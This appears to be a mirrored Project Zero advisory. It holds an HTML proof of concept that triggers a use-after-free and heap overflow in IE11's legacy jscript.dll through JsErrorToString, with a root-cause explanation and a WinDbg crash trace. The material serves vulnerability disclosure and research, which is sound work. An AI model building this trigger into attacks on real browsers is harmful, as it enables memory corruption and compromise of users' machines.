扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 |
<!-- Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1340 There is a use-after-free in jscript.dll library that can be exploited in IE11. jscript.dll is an old JavaScript library that was used in IE 8 and back. However, IE11 can still load it if put into IE8 compatibility mode and if there is a script tag that can only be understood by the older library (specifically, a script tag with language="Jscript.Encode" attribute will do the trick). PoC: ========================================= --> <!-- saved from url=(0014)about:internet --> <html> <head> <meta http-equiv="X-UA-Compatible" content="IE=8"></meta> </head> <body> <script language="Jscript.Encode"> var e = new Error(); var o = {toString:function() { //alert('in toString'); e.name = 1; CollectGarbage(); //reallocate for(var i=0;i<100;i++) { e.name = {}; } return 'b'; }}; e.name = Array(1000).join('a'); e.message = o; //alert('calling JsErrorToString'); var result = e.toString(); //alert('boom'); alert(result); </script> </body> </html> <!-- ========================================= This is a use-after-free in jscript!JsErrorToString that can lead to a heap overflow. (The PoC above crashes in memcpy when attempting to copy a large amount of data). When JsErrorToString runs, it tries to concatenate “name” and “message” properties of an Error object into an AString object (AString is a string type that is implemented as a list of simpler string parts). First the function converts both “name” and “message” properties to strings using the ConvertToString function, however the second call to ConvertToString can trigger a callback (via toString) and delete the “name” string. Later, when AString is converted to the BString in AString::ConvertToBSTR, the size of the result BString could be calculated incorrectly which can lead to a heap overflow. Debug log: ========================================= (10b8.1364): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000003 ebx=00000006 ecx=dcbabbb8 edx=00000003 esi=e6e8bb7f edi=e900fb9b eip=751c9a6c esp=09dfbdfc ebp=09dfbe04 iopl=0 nv up ei ng nz na pe nc cs=0023ss=002bds=002bes=002bfs=0053gs=002b efl=00010286 msvcrt!memcpy+0x270: 751c9a6c 8a4603mov al,byte ptr [esi+3]ds:002b:e6e8bb82=?? 0:008> k # ChildEBP RetAddr 00 09dfbe04 7013c367 msvcrt!memcpy+0x270 01 09dfbe28 7013c3df jscript!AString::ConvertToBSTR+0x86 02 09dfbe30 7013eeff jscript!VAR::ConvertASTRtoBSTR+0x13 03 09dfbe6c 7013af84 jscript!InvokeDispatch+0x424 04 09dfbf38 7013aefe jscript!InvokeDispatchEx+0x7a 05 09dfbf68 701244a7 jscript!VAR::InvokeByDispID+0x90 06 09dfc360 701248ff jscript!CScriptRuntime::Run+0x12b9 07 09dfc45c 70124783 jscript!ScrFncObj::CallWithFrameOnStack+0x15f 08 09dfc4b4 70124cc3 jscript!ScrFncObj::Call+0x7b 09 09dfc558 70133797 jscript!CSession::Execute+0x23d 0a 09dfc5a0 70135353 jscript!COleScript::ExecutePendingScripts+0x16b 0b 09dfc61c 70135139 jscript!COleScript::ParseScriptTextCore+0x206 0c 09dfc648 6bcecf1c jscript!COleScript::ParseScriptText+0x29 0d 09dfc680 6bced6da MSHTML!CActiveScriptHolder::ParseScriptText+0x51 0e 09dfc6f0 6ba5f185 MSHTML!CScriptCollection::ParseScriptText+0x1c6 0f 09dfc7dc 6ba5ecf7 MSHTML!CScriptData::CommitCode+0x31e 10 09dfc85c 6ba5f8bd MSHTML!CScriptData::Execute+0x232 11 09dfc87c 6bced030 MSHTML!CHtmScriptParseCtx::Execute+0xed 12 09dfc8d0 6bcf8265 MSHTML!CHtmParseBase::Execute+0x201 13 09dfc8ec 6b76388c MSHTML!CHtmPost::Broadcast+0x18e 14 09dfca24 6b894a9d MSHTML!CHtmPost::Exec+0x617 15 09dfca44 6b894a03 MSHTML!CHtmPost::Run+0x3d 16 09dfca60 6b89c1e5 MSHTML!PostManExecute+0x61 17 09dfca74 6b89d578 MSHTML!PostManResume+0x7b 18 09dfcaa4 6b796dbc MSHTML!CHtmPost::OnDwnChanCallback+0x38 19 09dfcabc 6b6d5b90 MSHTML!CDwnChan::OnMethodCall+0x2f 1a 09dfcb0c 6b6d577a MSHTML!GlobalWndOnMethodCall+0x16c 1b 09dfcb60 760f62fa MSHTML!GlobalWndProc+0x103 1c 09dfcb8c 760f6d3a user32!InternalCallWinProc+0x23 1d 09dfcc04 760f77c4 user32!UserCallWinProcCheckWow+0x109 1e 09dfcc64 760f788a user32!DispatchMessageWorker+0x3b5 1f 09dfcc74 6cada8ec user32!DispatchMessageW+0xf 20 09dffe40 6cb056d8 IEFRAME!CTabWindow::_TabWindowThreadProc+0x464 21 09dfff00 76ab2f5c IEFRAME!LCIETab_ThreadProc+0x3e7 22 09dfff18 74693a31 iertutil!CMemBlockRegistrar::_LoadProcs+0x67 23 09dfff50 7667336a IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x94 24 09dfff5c 77379902 kernel32!BaseThreadInitThunk+0xe 25 09dfff9c 773798d5 ntdll!__RtlUserThreadStart+0x70 26 09dfffb4 00000000 ntdll!_RtlUserThreadStart+0x1b ========================================= --> |
体验盒子
